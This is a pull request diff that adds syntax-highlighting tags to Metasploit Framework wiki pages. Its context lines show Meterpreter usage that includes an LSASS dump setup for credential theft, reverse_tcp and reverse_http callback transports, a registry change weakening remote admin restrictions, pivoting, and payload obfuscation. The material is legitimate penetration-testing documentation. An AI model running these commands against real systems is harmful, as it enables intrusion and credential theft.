### PR TITLE
Add syntax highlighting to multiple code snippets

### DIFF
--- a/docs/metasploit-framework.wiki/Committer-Keys.md
+++ b/docs/metasploit-framework.wiki/Committer-Keys.md
@@ -106,7 +106,7 @@ Enter passphrase: [...]
 
 2. Modify your `.git/config` file to enable signing commits and merges by default:
 
-````
+```ini
 [user]
   name = Your Name
   email = your_email@example.com
@@ -114,7 +114,7 @@ Enter passphrase: [...]
 [alias]
   c = commit -S --edit
   m = merge -S --no-ff --edit
-````
+```
 
 Using `git c` and `git m` from now on will sign every commit with your `DEADBEEF` key. However, note that rebasing or cherry-picking commits will change the commit hash, and therefore, unsign the commit -- to resign the most recent, use `git c --amend`.
 

--- a/docs/metasploit-framework.wiki/Creating-Metasploit-Framework-LoginScanners.md
+++ b/docs/metasploit-framework.wiki/Creating-Metasploit-Framework-LoginScanners.md
@@ -147,7 +147,7 @@ This method is just a stub on the Base mixin. It will be overridden in each Logi
 
 For an example let's look at the attempt_login method from `Metasploit::Framework::LoginScanner::FTP (lib/metasploit/framework/login_scanner/ftp.rb)`
  
- ```ruby
+```ruby
  # (see Base#attempt_login)
 def attempt_login(credential)
   result_options = {
@@ -170,7 +170,7 @@ def attempt_login(credential)
 
   ::Metasploit::Framework::LoginScanner::Result.new(result_options)
 end
- ```
+```
  
 ### scan!
 

--- a/docs/metasploit-framework.wiki/How-To-Use-Plugins.md
+++ b/docs/metasploit-framework.wiki/How-To-Use-Plugins.md
@@ -59,7 +59,7 @@ The current available plugins for Metasploit can be found by running the `load -
 
 The Alias plugin adds the ability to alias console commands:
 
-```
+```msf
 msf6 > load alias
 [*] Successfully loaded plugin: alias
 msf6 > alias -h
@@ -87,7 +87,7 @@ Proxies => http:localhost:8079
 
 Viewing registered aliases:
 
-```
+```msf
 msf6 > alias
 
 Current Aliases

--- a/docs/metasploit-framework.wiki/How-to-log-in-Metasploit.md
+++ b/docs/metasploit-framework.wiki/How-to-log-in-Metasploit.md
@@ -38,7 +38,7 @@ For debugging purposes, it's always better to turn on the highest level of loggi
 
 There are mainly five logging methods you will most likely be using a lot, and they all have the exact same arguments. Let's use one of the logging methods to explain what these arguments are about:
 
-```
+```ruby
 def elog(msg, src = 'core', level = 0, from = caller)
 ```
 

--- a/docs/metasploit-framework.wiki/How-to-obfuscate-JavaScript-in-Metasploit.md
+++ b/docs/metasploit-framework.wiki/How-to-obfuscate-JavaScript-in-Metasploit.md
@@ -50,7 +50,7 @@ And then you are ready to go.
 
 The first thing you do with ObfuscateJS is you need to initialize it with the JavaScript you want to obfuscate, so in this case, begin like the following:
 
-```
+```ruby
 js = %Q|
 var arrr = new Array();
 arrr[0] = windows.document.createElement("img");
@@ -82,7 +82,7 @@ So if I want to obfuscate the variable ```arrr```, and I want to obfuscate the s
 
 In some cases, you might actually want to know the obfuscated version of a symbol name. One scenario is calling a JavaScript function from an element's event handler, such as this:
 
-```
+```html
 <html>
 <head>
 <script>
@@ -150,7 +150,7 @@ This time we'll do a "hello world" example:
 
 And here's the output:
 
-```
+```javascript
 window[(function () { var _d="t",y="ler",N="a"; return N+y+_d })()]((function () { var f='d!',B='orl',Q2='h',m='ello, w'; return Q2+m+B+f })());
 ```
 

--- a/docs/metasploit-framework.wiki/How-to-use-Metasploit-JSON-RPC.md
+++ b/docs/metasploit-framework.wiki/How-to-use-Metasploit-JSON-RPC.md
@@ -89,7 +89,7 @@ First ensure you are running the Metasploit database, and are running the JSON s
 
 Request:
 
-```
+```sh
 curl --request POST \
   --url http://localhost:8081/api/v1/json-rpc \
   --header 'Content-Type: application/json' \
@@ -118,7 +118,7 @@ Response:
 
 Request:
 
-```
+```sh
 curl --request POST \
   --url http://localhost:8081/api/v1/json-rpc \
   --header 'Content-Type: application/json' \
@@ -155,7 +155,7 @@ Response:
 
 Request:
 
-```
+```sh
 curl --request POST \
   --url http://localhost:8081/api/v1/json-rpc \
   --header 'content-type: application/json' \
@@ -185,7 +185,7 @@ Response:
 Metasploit modules support running `check` methods which can be used to identify the success of an exploit module, or to run an
 auxiliary module against a target. For instance, with an Auxiliary module check request:
 
-```
+```sh
 curl --request POST \
   --url http://localhost:8081/api/v1/json-rpc \
   --header 'Content-Type: application/json' \
@@ -205,7 +205,7 @@ curl --request POST \
 
 Or an Exploit module check request:
 
-```
+```sh
 curl --request POST \
   --url http://localhost:8081/api/v1/json-rpc \
   --header 'content-type: application/json' \
@@ -240,7 +240,7 @@ The response will contain an identifier which can be used to query for updates:
 
 Request:
 
-```
+```sh
 curl --request POST \
   --url http://localhost:8081/api/v1/json-rpc \
   --header 'Content-Type: application/json' \
@@ -288,7 +288,7 @@ It is possible to poll for module results using the id returned when running a m
 
 Request:
 
-```
+```sh
 curl --request POST \
   --url http://localhost:8081/api/v1/json-rpc \
   --header 'Content-Type: application/json' \
@@ -353,7 +353,7 @@ but the memory is limited to 35mb as the memory datastore used is implemented by
 
 Request:
 
-```
+```sh
 curl --request POST \
   --url http://localhost:8081/api/v1/json-rpc \
   --header 'Content-Type: application/json' \
@@ -445,7 +445,7 @@ curl --request POST \
 
 Run the analyze command:
 
-```
+```sh
 curl --request POST \
   --url http://localhost:8081/api/v1/json-rpc \
   --header 'Authorization: Bearer ' \
@@ -491,7 +491,7 @@ Response:
 
 When analyzing a host, it is also possible to specify payload requirements for additional granularity:
 
-```
+```sh
 curl --request POST \
   --url http://localhost:8081/api/v1/json-rpc \
   --header 'Authorization: Bearer ' \

--- a/docs/metasploit-framework.wiki/How-to-use-command-stagers.md
+++ b/docs/metasploit-framework.wiki/How-to-use-command-stagers.md
@@ -128,7 +128,7 @@ The best way to let the user decide what kind of payload to use is by defining s
 
 Here is an example targets section from a command injection module:
 
-```
+```ruby
     'Targets' => [
       [
         'Unix Command',

--- a/docs/metasploit-framework.wiki/How-to-use-fetch-payloads.md
+++ b/docs/metasploit-framework.wiki/How-to-use-fetch-payloads.md
@@ -182,7 +182,7 @@ payloads.  All I did was give an array value for the `Platform` value and change
 
 For the `execute_command` method, nothing changes:
 
-``` ruby
+```ruby
 def execute_command(cmd, _opts = {})
 populate_values if @sid.nil? || @token.nil?
 uri = datastore['URIPATH'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php'
@@ -206,7 +206,7 @@ end
 The only change in the exploit method is the use of the more generic `Type` value in the case statement.  Nothing else
 needs to change.
 
-``` ruby
+```ruby
   def exploit
     print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
     case target['Type']
@@ -221,7 +221,7 @@ needs to change.
 If you have an exploit that already supports Unix Command payloads and you'd like it to support Linux Command payloads
 like Fetch Payloads, you can simply add the `linux` value to the platform array:
 
-``` ruby
+```ruby
 'Nix Command',
   {
     'Platform' => [ 'unix', 'linux' ],

--- a/docs/metasploit-framework.wiki/Landing-Pull-Requests.md
+++ b/docs/metasploit-framework.wiki/Landing-Pull-Requests.md
@@ -54,16 +54,16 @@ In addition, we're going to add a magical line to the config file that will let 
 
 So, open up `metasploit-framework/.git/config` with your favorite editor, add an upstream remote, and add the pull request refs for both your and Rapid7's forks. In the end, you should have a section that started off like this:
 
-````config
+```config
 [remote "upstream"]
   fetch = +refs/heads/*:refs/remotes/upstream/*
   fetch = +refs/pull/*/head:refs/remotes/upstream/pr/*
   url = https://github.com/rapid7/metasploit-framework
-````
+```
 
 And now it looks like this:
 
-````config
+```config
 [remote "upstream"]
   fetch = +refs/heads/*:refs/remotes/upstream/*
   fetch = +refs/pull/*/head:refs/remotes/upstream/pr/*
@@ -72,13 +72,13 @@ And now it looks like this:
   fetch = +refs/heads/*:refs/remotes/origin/*
   fetch = +refs/pull/*/head:refs/remotes/origin/pr/*
   url = https://github.com/YOURNAME/metasploit-framework
-````
+```
 
 Some people like to copy these over into remotes named "rapid7" and "yourusername" just so they don't have to remember about "origin" and "upstream," but for this doc, we'll just assume you have "origin" and "upstream" defined like this.
 
 Now, you can git fetch the remote PRs. This will take a little bit, since we have a couple dozen MBs of pull request data. Storage is cheap, though, right?
 
-````
+```
 $ git fetch --all
 Fetching todb-r7
 remote: Counting objects: 13, done.
@@ -97,7 +97,7 @@ From https://github.com/rapid7/metasploit-framework
  [... bunches of tags and PRs ...]
  * [new ref]         refs/pull/1701/head -> upstream/pr/1701
  * [new ref]         refs/pull/1702/head -> upstream/pr/1702
-````
+```
 
 You can `git fetch` a remote any time, and you'll get access to the latest changes to all branches and pull requests.
 
@@ -105,7 +105,7 @@ You can `git fetch` a remote any time, and you'll get access to the latest chang
 
 A manageable strategy for dealing with outstanding PRs is to start pre-merge testing on the pull request in isolation. For example, to work on PR #1217, we would:
 
-````
+```
 $ git checkout upstream/pr/1217
 Note: checking out 'upstream/pr/1217'.
 
@@ -124,7 +124,7 @@ HEAD is now at 9e499e5... Make BindTCP test more robust
 
 ```
 $ git checkout -b landing-1217
-````
+```
 
 Now, we're on a local branch identical to the original pull request, and can move on from there. We can make our changes, isolated from master, and then either send them back to the contributor (this requires looking up the original contributor's GitHub username and branch name on GitHub), or if there aren't any changes or the changes are trivial, we can land them (if you have committer rights to Rapid7's repo, this is where you land them to the upstream repo).
 
@@ -173,7 +173,7 @@ You need to add their fork once as a remote: `git remote add OTHER_USER git://gi
 
 # Making changes
 
-````
+```
 $ gvim .gitignore
 [... make some changes and some commits ...]
 (landing-1217) todb@mazikeen:~/git/rapid7/metasploit-framework
@@ -184,19 +184,19 @@ $ git push origin pr1271-fix-gitignore-conflict
 (pr1217-fix-gitignore-conflict) todb@mazikeen:~/git/rapid7/metasploit-framework
 $ git pr-url schierlm javapayload-maven
 Created new window in existing browser session.
-````
+```
 
 This sequence does a few things after editing `.gitconfig`. It creates another copy of landing-1217 (which is itself a copy of upstream/pr/1217)). Next, I push those changes to my branch (todb-r7, aka "origin"). Finally, I have a mighty [.gitconfig alias here](https://gist.github.com/todb-r7/5438391) to open a browser window to send a pull request to the original contributor's branch (you will want to edit yours to reflect your real GitHub username, of course).
 
-````
+```ini
 pr-url = !"echo https://github.com/YOURNAME/metasploit-framework/pull/new/HISNAME:HISBRANCH...YOURBRANCH"
-````
+```
 
 Filling in the blanks (provided by the original PR's information from GitHub) gets me:
 
-````
+```
 https://github.com/todb-r7/metasploit-framework/pull/new/schierlm:javapayload-maven...pr1217-fix-gitignore-conflict
-````
+```
 
 I opened that in a browser, and ended up with https://github.com/schierlm/metasploit-framework/pull/1 . Once [@schierlm](https://github.com/schierlm) landed it on his branch (again, using `git merge --no-ff` and a short, informational merge commit message), all I (or anyone) had to do was `git fetch` to get the change reflected in upstream/pr/1217, and then the integration of the PR could continue.
 
@@ -208,7 +208,7 @@ Note the important bit here: **you do not need commit rights to Rapid7 to branch
 
 Back to PR #1217. Turns out, my change was enough to land the original chunk of work. So, someone else ([@jlee-r7](https://github.com/jlee-r7)) was able to to do something like this:
 
-````
+```
 $ git fetch upstream
 remote: Counting objects: 12, done.
 remote: Compressing objects: 100% (2/2), done.
@@ -216,31 +216,31 @@ remote: Total 7 (delta 5), reused 7 (delta 5)
 Unpacking objects: 100% (7/7), done.
 From https://github.com/rapid7/metasploit-framework
    9e499e5..263e967  refs/pull/1651/head -> upstream/pr/1651
-````
+```
 
 This all looked good, so he could land this to Rapid7's repo with:
 
-````
+``
 $ git checkout -b upstream-master --track upstream/master
 $ git merge -S --no-ff --edit landing-1217
 $ git push upstream upstream-master:master
-````
+``
 
 Or, if he already have upstream-master checked out:
 
-````
+```
 $ git checkout upstream-master
 $ git rebase upstream/master
 $ git merge -S --no-ff --edit landing-1217
 $ git push upstream upstream-master:master
-````
+```
 
 The `--edit` is optional if we have our editor configured correctly in `$HOME/.gitconfig`. The point here is that we *always* want a merge commit, and we *never* want to use the (often useless) default merge commit message. For #1217, this was changed to:
 
-````commit
+```
 Land #1217, java payload build system refactor
 
-````
+```
 
 Note that you should rebase *before* landing -- otherwise, your merge commit will be lost in the rebase.
 
@@ -248,7 +248,7 @@ Finally, the -S indicates we are going to sign the merge, using our GPG key. Thi
 
 To set yourself up for signing, your .gitconfig (or metasploit-framework/git/.config) file should have these entries:
 
-````
+```ini
 [user]
 name = Your Name
 email = your@email.xxx
@@ -256,7 +256,7 @@ signingkey = DEADBEEF # Must match exactly with your key for "Your Name <your@em
 [alias]
 c = commit -S --edit
 m = merge -S --no-ff --edit
-````
+```
 
 People with commit rights to rapid7/metasploit-framework will have their [[keys listed here|./Committer-Keys.md]].
 
@@ -270,10 +270,6 @@ Release note examples:
 - [12831 Release notes](https://github.com/rapid7/metasploit-framework/pull/12831#issuecomment-577399914)
 
 The [rn-no-release-notes](https://github.com/rapid7/metasploit-framework/issues?utf8=%E2%9C%93&q=label%3Arn-no-release-notes+) label must be added if there are no release notes for the merged pull request.
-
-# Cross-linking PRs, Bugs, and Commits
-
-TODO: Update in this new post-Redmine, GitHub issues world
 
 # Merge conflicts
 

--- a/docs/metasploit-framework.wiki/Meterpreter-ExecuteBof-Command.md
+++ b/docs/metasploit-framework.wiki/Meterpreter-ExecuteBof-Command.md
@@ -33,8 +33,6 @@ The `bofloader` extension provides exactly one command, through which all of the
 
 `execute_bof </path/to/bof_file> [Options] -- [BOF Arguments]`
 
-
-
 * `-c` / `--compile` -- Compile the input file (requires mingw).
 * `-e` / `--entry` -- The entry point (default: `go`).
 * `-f` / `--format-string` -- Argument format-string. See details below.
@@ -79,7 +77,7 @@ argument format string.
 # Usage Examples
 Executing [dir][4], passing the path argument and number of sub-directories to list.
 
-```
+```msf
 meterpreter > execute_bof CS-Situational-Awareness-BOF/SA/dir/dir.x64.o --format-string Zs C:\\ 0
 Contents of C:\*:
 	08/05/2022 15:17           <dir> $Recycle.Bin
@@ -103,7 +101,7 @@ meterpreter >
 Executing [nanodump][5]. First the PID of LSASS is found, then the argument string is constructed. The output must be
 written to disk. Once completed, the dump file can be downloaded from the remote host.
 
-```
+```msf
 meterpreter > ps lsass
 Filtering on 'lsass'
 

--- a/docs/metasploit-framework.wiki/Meterpreter-Reg-Command.md
+++ b/docs/metasploit-framework.wiki/Meterpreter-Reg-Command.md
@@ -32,7 +32,7 @@ Each value also has an associated type, for example:
 
 All of these examples assume you are in a Meterpreter session. To see the latest help information run `help reg`:
 
-```
+```msf
 meterpreter > help reg
 Usage: reg [command] [options]
 Interact with the target machine's registry.
@@ -44,7 +44,7 @@ Interact with the target machine's registry.
 
 Registry keys must be escaped correctly. Window's registry keys are escaped with backslashes. In msfconsole backslashes and spaces have a special meaning - which means you will need to escape these characters for your key to work as expected.
 
-```
+```msf
 # Valid: Using single quotes around the registry key
 meterpreter > reg enumkey -k 'HKCU\Keyboard Layout'
 
@@ -75,7 +75,7 @@ Active sessions
 
 For example - when interacting with a x86 session there are 12 keys listed:
 
-```
+```msf
 # x86 Session
 meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
 Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
@@ -86,7 +86,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
 
 Versus a x64 session which shows 23 keys:
 
-```
+```msf
 # x64 Session
 meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows'
 Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
@@ -98,7 +98,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
 
 If this is problematic either [[upgrade your session to Meterpreter|./Metasploit-Guide-Upgrading-Shells-to-Meterpreter.md]], or specify the `-w` flag which will impact the result of queries:
 
-```
+```msf
 meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows' -w 32
 Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
 
@@ -106,7 +106,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
   # ... omitted for clarity ...
 ```
 
-```
+```msf
 meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows' -w 64
 Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
 
@@ -119,7 +119,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
 
 Enumerate a root key:
 
-```
+```msf
 meterpreter > reg enumkey -k HKLM
 Enumerating: HKLM
 
@@ -135,7 +135,7 @@ Enumerating: HKLM
 
 Enumerate a subkey:
 
-```
+```msf
 meterpreter > reg enumkey -k 'HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run'
 Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
 
@@ -149,7 +149,7 @@ Enumerating: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
 
 Display the registry value and type information:
 
-```
+```msf
 meterpreter > reg queryval -k 'HKLM\Software\Microsoft\Windows NT\CurrentVersion' -v ProductName
 Key: HKLM\Software\Microsoft\Windows NT\CurrentVersion
 Name: ProductName
@@ -159,7 +159,7 @@ Data: Windows 10 Enterprise
 
 Values that are of type `REG_SZ_EXPAND` such as ` %SystemRoot%\system32\drivers\GM.DLS` will not automatically be expanded:
 
-```
+```msf
 meterpreter > reg queryval -k 'HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectMusic' -v 'GMFilePath'
 Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\DirectMusic
 Name: GMFilePath
@@ -169,7 +169,7 @@ Data: C:\Windows\system32\drivers\GM.DLS
 
 Values that are of type `REG_MULTI_SZ` will be separated by `\0`:
 
-```
+```msf
 meterpreter > reg queryval -k 'HKLM\Software\example' -v 'example multi value with spaces'
 Key: HKLM\Software\example
 Name: example multi value with spaces
@@ -179,7 +179,7 @@ Data: line1\0line2\0line3
 
 ### Creating a key
 
-```
+```msf
 meterpreter > reg createkey -k 'HKLM\software\example'
 Successfully created key: HKLM\software\example
 ```
@@ -188,42 +188,42 @@ Successfully created key: HKLM\software\example
 
 Setting a `REG_DWORD` - use a decimal value:
 
-```
+```msf
 meterpreter > reg setval -k 'HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\system' -v LocalAccountTokenFilterPolicy -t REG_DWORD -d 1
 Successfully set LocalAccountTokenFilterPolicy of REG_DWORD.
 ```
 
 Setting a `REG_QWORD` - use a decimal value:
 
-```
+```msf
 meterpreter > reg setval -k 'HKLM\Software\example' -t REG_DWORD -v qword_example -d 12345678
 Successfully set example multi value with spaces of REG_MULTI_SZ.
 ```
 
 Setting `REG_MULTI_SZ` - i.e. an array of strings:
 
-```
+```msf
 meterpreter > reg setval -k 'HKLM\Software\example' -t REG_MULTI_SZ -v 'example multi value with spaces' -d 'line1\0line2\0line3'
 Successfully set example multi value with spaces of REG_MULTI_SZ.
 ```
 
 Setting `REG_BINARY` - use lowercase hexadecimal input without the preceding `0x`:
 
-```
+```msf
 meterpreter > reg setval -k 'HKLM\Software\example' -t REG_BINARY -v binary_example -d deadbeef
 Successfully set binary_example of REG_BINARY.
 ```
 
 ### Deleting a key
 
-```
+```msf
 meterpreter > reg deletekey -k 'HKLM\software\example'
 Successfully deleted key: HKLM\software\example
 ```
 
 ### Deleting a value
 
-```
+```msf
 meterpreter > reg deleteval -k 'HKLM\software\example' -v 'example multi value with spaces'
 Successfully deleted example multi value with spaces.
 ```

--- a/docs/metasploit-framework.wiki/Meterpreter-Sleep-Control.md
+++ b/docs/metasploit-framework.wiki/Meterpreter-Sleep-Control.md
@@ -16,7 +16,7 @@ During this dormant period, no socket is active, no requests are made, and no re
 
 The interface to the sleep command looks like this:
 
-```
+```msf
 meterpreter > sleep
 Usage: sleep <time>
 
@@ -31,7 +31,7 @@ As shown, `sleep` expects to be given a single postive integer value that repres
 
 The following shows a sample run where Meterpreter is put to sleep for 20 seconds, after which the session reconnects while the handler is still in background:
 
-```
+```msf
 meterpreter > sleep 20
 [*] Telling the target instance to sleep for 20 seconds ...
 [+] Target instance has gone to sleep, terminating current session.

--- a/docs/metasploit-framework.wiki/Meterpreter-Stageless-Mode.md
+++ b/docs/metasploit-framework.wiki/Meterpreter-Stageless-Mode.md
@@ -57,7 +57,7 @@ The data or time cost of uploading `metsrv`, `stdapi` and `priv` for every singl
  
 It's hard to believe it possible, but in this case the following image could be considered a nightmare.
 
-```
+```msf
 [*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx
 [*] Meterpreter session 4684 opened ....
 [*] Sending stage (173056 bytes) to xxx.xxx.xxx.xxx

--- a/docs/metasploit-framework.wiki/Meterpreter-Timeout-Control.md
+++ b/docs/metasploit-framework.wiki/Meterpreter-Timeout-Control.md
@@ -44,7 +44,7 @@ While the current time is within the `retry total` time, Meterpreter will consta
 
 Meterpreter supports the querying and updating of each of these timeouts via the console. In order to get the current timeout settings, users can invoke the `get_timeouts` command, which returns all four of the current timeout settings (one for the global session, and three for the transport-specific settings). An example of which is shown below:
 
-```
+```msf
 meterpreter > get_timeouts 
 Session Expiry  : @ 2015-06-09 19:56:05
 Comm Timeout    : 100000 seconds
@@ -56,7 +56,7 @@ The `Session Expiry` value is rendered as an absolute local time so that the use
 
 In order to update these values, users can invoke the `set_timeouts` command. Invoking it without parameters shows the help:
 
-```
+```msf
 meterpreter > set_timeouts 
 Usage: set_timeouts [options]
 
@@ -77,7 +77,7 @@ In the case of the `-x` parameter, the value that is to be passed in should repr
 
 The following example updates the session expiration timeout to be `2` minutes from "now", and changes the retry wait time to `3` seconds:
 
-```
+```msf
 meterpreter > set_timeouts -x 120 -t 3
 Session Expiry  : @ 2015-06-02 22:45:13
 Comm Timeout    : 100000 seconds
@@ -86,7 +86,7 @@ Retry Wait Time : 2500 seconds
 ```
 
 This command can be invoked any number of times while the session is valid, but as soon as the session has expired, Metepreter will shut down and it's game over:
-```
+```msf
 meterpreter > 
 [*] 10.1.10.35 - Meterpreter session 2 closed.  Reason: Died
 ```

--- a/docs/metasploit-framework.wiki/Meterpreter-Transport-Control.md
+++ b/docs/metasploit-framework.wiki/Meterpreter-Transport-Control.md
@@ -26,7 +26,7 @@ Meterpreter has a new base command called `transport`. This is the hub of all tr
 
 The following output shows the current help text for the `transport` command:
 
-```bash
+```msf
 meterpreter > transport
 Usage: transport <list|change|add|next|prev|remove> [options]
 
@@ -65,7 +65,7 @@ OPTIONS:
 
 The simplest of all the sub-commands in the `transport` set is `list`. This command shows the full list of currently enabled transport, and an indicator of which one is the "current" transport. The following shows the non-verbose output with just the default transport running:
 
-```bash
+```msf
 meterpreter > transport list
 Session Expiry  : @ 2015-06-09 19:56:05
 
@@ -82,7 +82,7 @@ The above output shows that we have one transport enabled that is using `TCP`. W
 
 The verbose version of this command shows more detail about the transport, but only in cases where extra detail is available (such as `reverse_http/s`). The following command shows the output of the `list` sub-command with the verbose flag (`-v`) after an `HTTP` transport has been added:
 
-```bash
+```msf
 meterpreter > transport list -v
 Session Expiry  : @ 2015-06-09 19:56:05
 
@@ -98,7 +98,7 @@ Adding transports gives Meterpreter the ability to work on different transport m
 
 The following command shows a simple example that adds a `reverse_http` transport to an existing Meterpreter session. It specifies a custom communications timeout, retry total and retry wait, and also specifies a custom user-agent string to be used for the HTTP requests:
 
-```bash
+```msf
 meterpreter > transport add -t reverse_http -l 10.1.10.40 -p 5105 -T 50000 -W 2500 -C 100000 -A "Totes-Legit Browser/1.1"
 [*] Adding new transport ...
 [+] Successfully added reverse_http transport.
@@ -127,7 +127,7 @@ It is also possible to specify the following:
 
 The following shows another example which adds another `reverse_tcp` transport to the transport list:
 
-```bash
+```msf
 meterpreter > transport add -t reverse_tcp -l 10.1.10.40 -p 5005
 [*] Adding new transport ...
 [+] Successfully added reverse_tcp transport.
@@ -155,7 +155,7 @@ The three different ways to change transports are:
 
 As an example, here is the current transport setup:
 
-```bash
+```msf
 meterpreter > transport list
 Session Expiry  : @ 2015-06-09 19:56:05
 
@@ -168,7 +168,7 @@ Session Expiry  : @ 2015-06-09 19:56:05
 
 Moving to the next transport:
 
-```bash
+```msf
 meterpreter > transport next
 [*] Changing to next transport ...
 [+] Successfully changed to the next transport, killing current session.
@@ -195,7 +195,7 @@ This output shows that we moved from the original `reverse_tcp` to the `reverse_
 
 Moving to the next transport again takes the session to the second `reverse_tcp` listener:
 
-```bash
+```msf
 meterpreter > transport next
 [*] Changing to next transport ...
 [+] Successfully changed to the next transport, killing current session.
@@ -218,7 +218,7 @@ Session Expiry  : @ 2015-06-09 19:56:06
 
 From here, moving backward sends Meterpreter back to the `reverse_http` listener:
 
-```bash
+```msf
 meterpreter > transport prev
 [*] Changing to previous transport ...
 
@@ -252,7 +252,7 @@ The command is similar to `add` in that it takes a subset of the parameters, and
 * `-p` - The `LPORT` value.
 * `-u` - This value is only required for `reverse_http/s` transports and needs to contain the URI of the transport in question. This is important because there might be multiple listeners on the same IP and port, so the URI is what differentiates each of the sessions.
 
-```bash
+```msf
 [*] Starting interaction with 2...
 
 meterpreter > transport list
@@ -282,7 +282,7 @@ Previously, Meterpreter only had built-in resiliency in the `HTTP/S` payloads an
 
 The following shows Metasploit being closed and leaving the existing `TCP` session running behind the scenes:
 
-```bash
+```msf
 meterpreter > transport list
 Session Expiry  : @ 2015-06-09 19:56:05
 
@@ -301,7 +301,7 @@ With Metasploit closed, the Meterpreter session has detected that the transport 
 
 The following output shows Metasploit being re-launched with the appropriate listeners, and the existing Meterpreter instance establishing a session automatically:
 
-```bash
+```msf
 ./msfconsole -r ~/msf.rc
 [*] Starting the Metasploit Framework console...|
 IIIIII    dTb.dTb        _.---._

--- a/docs/metasploit-framework.wiki/Module-Documentation.md
+++ b/docs/metasploit-framework.wiki/Module-Documentation.md
@@ -49,7 +49,7 @@ If you go to `metasploit-framework/documentation/modules`, you'll see that there
 
 For example:
 
-```
+```msf
 msf> use auxiliary/scanner/smb/smb_login
 msf (smb_login)> info
 

--- a/docs/metasploit-framework.wiki/Nightly-Installers.md
+++ b/docs/metasploit-framework.wiki/Nightly-Installers.md
@@ -4,7 +4,7 @@ Installers are built nightly for macOS, Windows (64-bit) and Linux.  These insta
 
 The following script invocation will import the Rapid7 signing key and setup the package for supported Linux and macOS systems:
 
-```
+```sh
 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
   chmod 755 msfinstall && \
   ./msfinstall
@@ -33,7 +33,7 @@ If you downloaded Metasploit from us, there is no cause for alarm.  We pride our
 ### Windows silent installation
 
 The PowerShell below will download and install the framework, and is suitable for automated Windows deployments. Note that, the installer will be downloaded to `$DownloadLocation` and won't be deleted after the script has run.
-```
+```powershell
 [CmdletBinding()]
 Param(
     $DownloadURL = "https://windows.metasploit.com/metasploitframework-latest.msi",

--- a/docs/metasploit-framework.wiki/Pivoting-in-Metasploit.md
+++ b/docs/metasploit-framework.wiki/Pivoting-in-Metasploit.md
@@ -290,7 +290,7 @@ Active sessions
 #### Local Port Forwarding
 To set up a port forward using Metasploit, use the `portfwd` command within a supported session's console such as the Meterpreter console. Using `portfwd -h` will bring up a help menu similar to the following:
 
-```
+```msf
 meterpreter > portfwd -h
 Usage: portfwd [-h] [add | delete | list | flush] [args]
 
@@ -309,7 +309,7 @@ meterpreter >
 
 To add a port forward, use `portfwd add` and specify the `-l`, `-p` and `-r` options at a minimum to specify the local port to listen on, the report port to connect to, and the target host to connect to respectively.
 
-```
+```msf
 meterpreter > portfwd add -l 1090 -p 443 -r 169.254.37.128
 [*] Local TCP relay created: :1090 <-> 169.254.37.128:443
 meterpreter >
@@ -338,7 +338,7 @@ Note that you may need to edit your `/etc/hosts` file to map IP addresses to giv
 #### Listing Port Forwards and Removing Entries
 Can list port forwards using the `portfwd list` command. To delete all port forwards use `portfwd flush`. Alternatively to selectively delete local port forwarding entries, use `portfwd delete -l <local port>`.
 
-```
+```msf
 meterpreter > portfwd delete -l 1090
 [*] Successfully stopped TCP relay on 0.0.0.0:1090
 meterpreter > portfwd list
@@ -355,7 +355,7 @@ To set up a reverse port forward, use `portfwd add -R` within a supported sessio
 
 For example to listen on port 9093 on a target session and have it forward all traffic to the Metasploit machine at 172.20.97.72 on port 9093 we could execute `portfwd add -R -l 4444 -L 172.20.97.73 -p 9093` as shown below, which would then cause the machine who have a session on to start listening on port 9093 for incoming connections.
 
-```
+```msf
 meterpreter > portfwd add -R -l 4444 -L 172.20.97.73 -p 9093
 [*] Local TCP relay created: 172.20.97.73:4444 <-> :9093
 meterpreter > netstat -a
@@ -446,7 +446,7 @@ socks5 127.0.0.1 1080
 
 The final final should look something like this:
 
-```
+```ini
 # proxychains.conf  VER 3.1
 #
 #        HTTP, SOCKS4, SOCKS5 tunneling proxifier with DNS.

--- a/docs/metasploit-framework.wiki/Python-Extension.md
+++ b/docs/metasploit-framework.wiki/Python-Extension.md
@@ -11,12 +11,12 @@ Unfortunately, at this point in time the extension only works inside x86 and x64
 # Usage
 
 As with any other extension that comes with Meterpreter, loading it is very simple:
-```
+```msf
 meterpreter > use python
 Loading extension python...success.
 ```
 Once loaded, the help system shows the commands that come with the extension:
-```
+```msf
 meterpreter > help
 
     ... snip ...
@@ -36,7 +36,7 @@ Each of these commands is discussed in detail below.
 ## python_execute
 
 The `python_execute` command is the simplest of all commands that come with the extension, and provides the means to run single-shot lines of Python code, much in the same way that the normal Python interpreter functions from the command-line when using the `-c` switch. The full help for the command is as follows:
-```
+```msf
 meterpreter > python_execute -h
 Usage: python_execute <python code> [-r result var name]
 
@@ -50,13 +50,13 @@ OPTIONS:
     -r <opt>  Name of the variable containing the result (optional)
 ```
 A very simple example of this command is shown below:
-```
+```msf
 meterpreter > python_execute "print 'Hi, from Meterpreter!'"
 [+] Content written to stdout:
 Hi, from Meterpreter!
 ```
 Notice that any output that is written to stdout is captured by Meterpreter and returned to Metasploit so that it's visible to the user. This also happens for anything written to stderr, as shown below:
